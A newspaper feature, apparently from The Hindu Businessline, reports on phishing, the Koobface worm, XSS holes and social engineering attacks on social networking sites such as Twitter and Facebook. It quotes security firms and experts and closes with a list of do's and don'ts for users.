Cyber criminals are targeting users of social networking sites
In one of the most high-profile cases of identity theft in recent times, the Twitter accounts of the British Energy Secretary, Ed Miliband, and House of Commons Leader, Harriet Harman, were hacked into and used to send “inappropriate” messages to their followers.
Following this, the official residence of the British Prime Minister, 10 Downing Street, was reported to have commissioned security checks on its own Twitter account and that of the Prime Minister, Gordon Brown, and his wife.
The British politicians are only the latest in a long line of victims of social networking scams. And they won’t be the last.
Every other day, news of cyber-attacks and ‘phishing scams’ on social networking sites hits the Web but the reports often go unnoticed in the media frenzy surrounding these sites, especially Twitter.
Phishing involves sending out legitimate-looking e-mails (apparently from popular, trustworthy sites) in order to gather personal or financial information. The mails are designed to entice people into entering personal details on Web sites that are remarkably similar to sites the users frequent or trust.
RING OF FIRE
Social networking sites, according to a report by security firm Symantec, topped the list of phishing attacks in most countries across the globe.
Almost all the top sites, including Twitter, Facebook, MySpace, and Orkut, have reported security vulnerabilities, which they made efforts to fix.
Perhaps the most notorious of these was Koobface (an anagram of ‘Facebook’), a computer worm that attacks sites such as Bebo, Friendster, MySpace and Facebook and attempts to gather sensitive data such as credit card numbers.
The worm spreads by delivering messages with links to a “video,” to friends of an infected Facebook user.
Those who click on the link will be directed to a third-party site where they are asked to install an executable file, in order to view the “video.” If the user does install it, the system is compromised. The worm disables security mechanisms and opens the computer for the attackers to abuse.
“Once infected, users are directed to more fraudulent Web sites risking identity theft and will spam more friends, leading to an exponential rise in infections,” says Debasis Nayak, Director of the Pune-based Asian School of Cyber Laws.
Last year, Twitter acknowledged “unauthorised access” by a French hacker who is believed to have broken into the site’s internal administration systems, gaining access to users’ accounts.
A 2009 report by security firm Sophos named Barack Obama, Britney Spears, Ashton Kutcher and Lily Allen as “(Twitter) users known to have been affected by the French hacker’s subsequent actions.”
Orkut, Facebook and Twitter have reported cross site scripting (XSS) holes, a security vulnerability that allows attackers to bypass security mechanisms and inject malicious scripts into Web pages, and thereby gain access to sensitive content.
The malicious code may be in the form of a hyperlink, which a user will click on, or even in the form of an e-mail message.
In November 2009, Symantec reported a malicious spam attack on Facebook, which was followed by a phishing attack. According to research published by Symantec, these spam messages looked like “an official invite or password reset confirmation mail.”
Once users click on the button marked ‘update’, they are “redirected to a look-alike phishing site. Here, users are asked to enter a password to complete the update procedure. Unfortunately, users’ passwords will be stolen if they try to log in, on this page,” the Symantec report states.
So what is it about networking sites that draws hackers by the dozen? Ratnamala Dam Manna, Director, Security Technology and Responses at Symantec, affirms that these sites have “grown to become the most obvious choice for attackers.”
According to a Trend Micro technical paper, “The shift from desktop-based applications to Web-based ones, particularly those on social networking sites, presents a new vector for abuse.”
“As more and more people communicate through social networks, the more viable social networks become malware distribution platforms,” the Trend Micro report states.
Malware or ‘malicious software’ is designed to break into your computer system and perform unwanted actions. Computer viruses, trojans, spyware, worms, et al constitute malware, each designed to cause a specific kind of damage.
Ratnamala avers that networking sites are “easy for criminals to spoof and since social networking pages are generally trusted by users, phishing attacks mimicking them may be more successful.”
Users often tend to disclose personal details and post photographs on their profiles. “Hackers use information gathered from others to carry out a social engineering attack,” she says.
Social engineering is the act of manipulating or tricking people into revealing personal or sensitive information. The attacker may use non-intrusive methods, and gain the confidence of the person, in order to gain access to the system or perpetrate a fraud. Phishing is one of the most common forms of social engineering.
Says Nayak, “Users of sites such as Orkut, Badoo, Perfspot, Twitter and Facebook are facing social engineering attacks. The attacks are based on the fact that subscribers tend to believe messages from friends on these sites more than they would believe spam e-mails.”
IMPACT ON BUSINESS
Research by Sophos has revealed that “two-thirds of businesses fear that social networking endangers corporate security.”
System administrators, the Sophos report adds, worry that “employees share too much personal information via their social networking sites, putting their corporate infrastructure — and the sensitive data stored on it — at risk.”
However, the growing popularity of networking sites and the benefits they provide seem to outweigh the risk factor.
Organisations and individuals, Sophos recommends, should perform regular Internet security checks, educate fellow users about risks and make sure sensitive information is not shared online.
Symantec advises users to be on their guard; especially if they notice anything unusual in e-mails they receive (typos, odd words, phrases or IP numbers). To ward off phishing attacks, “simply pass the cursor over the underlined hyperlink and then check the URL in the status bar of the browser. In the status bar, they can see if the link belongs to the appropriate domain or not,” the advisory states. Users are also advised to type the name of the Web site directly in the address bar of the browser, use complex passwords, avoid clicking on suspicious links or installing updates from unknown sites.
Nayak adds, “Be aware of and use security software for the browser and computer, and avoid turning on features such as Active X controls in the browser as far as possible.”
Dos and don’ts
Use up-to-date browsers and operating systems
Perform regular security scans of your computer
Do not share personal, financial information online
Ignore/delete suspicious e-mails, attachments
Check Web site links before clicking on them
Use complex passwords
====The Hindu Businessline